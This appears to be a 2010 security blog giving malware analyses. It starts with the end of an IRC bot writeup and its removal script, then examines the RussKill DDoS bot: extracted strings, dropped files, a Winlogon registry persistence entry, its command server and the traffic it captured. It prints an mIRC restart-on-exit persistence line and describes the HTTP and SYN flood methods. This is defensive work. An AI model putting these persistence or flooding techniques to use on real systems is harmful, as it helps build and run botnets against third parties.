C:\WINDOWS\Temp\spoolsv\users.ini
C:\WINDOWS\Temp\spoolsv\s.mrc
C:\WINDOWS\Temp\spoolsv\com.mrc
C:\WINDOWS\Temp\spoolsv\xmas.jpg
C:\WINDOWS\Temp\spoolsv\logs
C:\WINDOWS\Temp\spoolsv\sounds
C:\WINDOWS\Temp\spoolsv\download

From the script file com.mrc we can see also a sort of “restart on exit” code that make sure when mIRC is closed, the process spoolsv.exe is started again:

1	on *:exit: { /run $mircexe \| halt }

To remove this kind of threat from an infected system we can use a simple script that we will execute with our free software Threat Killer:

1
2
3

[DELETE FOLDERS RECURSIVE]
C:\WINDOWS\Temp\spoolsv\
[/END]

Output:

A new DDoS bot named RussKill is in the wild

admin — Tue, 09 Feb 2010 23:22:28 +0000

RussKill is another DDoS bot that is controlled by a web panel, where users can send commands to their bots and start to attack a specified website using two methods of DDoS:

HTTP-Flood that generates threaded queries to the index page of the website and try to make the attacked web page inaccessible from regular users, making the server output a “Network Timeout” error. This kind of attack can also crash the web server if the queries are not properly filtered by a firewall software.

SYN-Flood that send a series of SYN requests to the target system using spoofed IPs. When the target system tries to send the SYN-ACK message to the IP address that sent the SYN request, the spoofed IP can not send back the ACK message and the target system waits for the message.

The features described by the author of RussKill are:

- Bot is hidden from user
- Bot accept HTTP or HTTPS
- Bot protects its registry keys and values making hard the removal of these
- User can select the type of attack and the number of threads to use
- Powerful SYN-Flood
- Bot can attack on a custom port, domain:port
- User can select connection delay for a bot to connect to the web panel
- PHP and MySQL admin panel system

The bot is sold with the admin panel for 300 $ USD and the author offers a rebuild for a new domain for 50 $ USD.

We found a sample of the bot and Steve has unpacked the sample (with VMUnpacker), following there is interesting data extracted:

.aspack
.adata
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
TThreadLocalCounter
0.0.0.0
127.0.0.1
255.255.255.255
%d.%d.%d.%d
0.0.0.0
ws2_32.dll
wship6.dll
localhost
SF_Any
SF_IP4
SF_IP6
TSocksType
ST_Socks5
ST_Socks4
TSSLType
LT_all
LT_SSLv2
LT_SSLv3
LT_TLSv1
LT_TLSv1_1
LT_SSHv2
MaxLineLength(
MaxSendBandwidth(
MaxRecvBandwidth(
MaxBandwidth
InterPacketTimeout(
SendMaxChunk
StopFlag(
TSocksBlockSocket
OnCreateSocket
SocksIP
SocksPort
SocksUsername
SocksPassword
SocksTimeout
SocksResolver
SocksType
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
TCustomSSL
Synapse TCP/IP Socket error %d: %s
Proxy-Authorization: Basic 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
open
.exe
..w.i...n.f...d...d...
\memosssf.ini
\system32
\system32\
.exe
 /uninstall /silent
\System32\
\System32\lkdir.dll
\System32\lkdir
.dll
 /install /silent

From the above data we can see the bot was compiled with Delphi, it uses the Synapse TCP/IP component for connections and it was packed with ASPack:

.aspack
.adata

We can see the user agent the bot will use for the DDoS attacks:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)

We can see a reference to system32\ and to a file named lkdir.dll. We can also see the file name that the bot will gain when it is installed in the victim’s computer:

..w.i…n.f…d…d.. -> winfdd.exe

The bot looks like to support also command line parameters:

/install /silent

When the program is executed, it creates the following files:

%User%\Local Settings\Application Data\microsoft\windows\wtnmm.exe
%User%\Local Settings\Application Data\microsoft\windows\winfdd.exe
%User%\Local Settings\Application Data\microsoft\windows\95548.exe
%User%\Start Menu\Programs\Startup\wtnmm.exe

The program creates the following entries in the registry:

1 2	HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: explorer.exe, "%User%\Local Settings\Application Data\microsoft\windows\wtnmm.exe"

The bot established connections with one main IP address on the port 80, that we assume it is the web panel of the bot:

1	115.100.250.104 -> akakalat.com

We can see from the following traffic that the bot received a list of urls:

GET /779/s.php HTTP/1.0
Host: akakalat.com
 
[|250|60hxxp://www.cian(dot)ru/cat.php?type=2
hxxp://www.cian(dot)ru/cat.php?suburbian=yes&deal_type=2&object_type[1][|250|60hxxp://tvshowstock(dot)com
hxxp://dvdglee(dot)com/hot.php
hxxp://dvdorder3online(dot)com/products/MI5Spooks-Seasons-1-8-DVD-Boxset-DVDS-1934.htm]0|150|60hxxp://www.dvdcollects(dot)com/products/Lost-complete-Seasons-1-5-DVD-Boxset-DVDS-1664.html
hxxp://dvdsetshop16(dot)com/products/Farscape-Complete-Seasons-1-4-DVD-Boxset-DVDS-1466.html
hxxp://dvdcollects10(dot)com/List.aspx?CatID=13
hxxp://dvdsonyk(dot)com

After the bot has received the above traffic, it generated a file named thumbcac_888.db which contains the links and the commands to execute:

1	%User%\Local Settings\Application Data\microsoft\windows\thumbcac_888.db

The bot started now to visit all the links from the thumbcac_888.db file and one of the links contains obfuscated javascript that redirect the victim to another malicious link:

1	/List.aspx?CatID=13&"+decoder();

Decoded:

1	/List.aspx?CatID=13&jdfwkey=b9ogg2

After more than 24 hours of running we noticed some Internet Explorer windows open, that contained false security scans and fake security warnings, a common symptom of a rogue security software.